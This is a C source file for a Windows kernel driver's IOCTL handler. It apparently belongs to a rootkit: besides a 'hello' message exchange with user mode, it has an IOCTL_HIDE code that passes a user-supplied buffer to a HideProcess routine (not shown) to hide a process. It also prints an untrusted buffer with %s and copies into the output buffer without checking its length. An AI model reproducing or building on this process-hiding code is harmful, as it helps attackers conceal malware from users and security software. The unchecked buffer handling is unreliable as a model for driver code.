#include "header.h"
/*
*  IoControl function
*  input(1): IN PDEVICE_OBJECT DeviceObject
*  input(2): IN PIRP Irp
*  output: STATUS
*/
NTSTATUS IoControlFunction(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
  PIO_STACK_LOCATION IrpSl;
  ULONG CtlCode;
  PVOID pBuf = Irp->AssociatedIrp.SystemBuffer;
  PCHAR sayhello = "Hi! From kernelLand.";
  
  IrpSl = IoGetCurrentIrpStackLocation(Irp); // Initialise IrpSl
  CtlCode = IrpSl->Parameters.DeviceIoControl.IoControlCode; // Catch the IOCTL Code
   
  switch (CtlCode)
  {
    case IOCTL_HELLO : // Say Hello
	  DbgPrint("Received from the userLand: %s",pBuf);
      RtlZeroMemory(pBuf,IrpSl->Parameters.DeviceIoControl.InputBufferLength);
      RtlCopyMemory(pBuf , sayhello , strlen(sayhello) );
	break;
    case IOCTL_HIDE : // Hide a Process
	   DbgPrint("mot : %s", pBuf);
	   HideProcess(pBuf, IrpSl->Parameters.DeviceIoControl.InputBufferLength);
	   RtlZeroMemory(pBuf,IrpSl->Parameters.DeviceIoControl.InputBufferLength);
	break;
  }
  
  Irp->IoStatus.Status = STATUS_SUCCESS;
  Irp->IoStatus.Information = strlen(sayhello);

  IoCompleteRequest(Irp, IO_NO_INCREMENT);
  
  return STATUS_SUCCESS;
}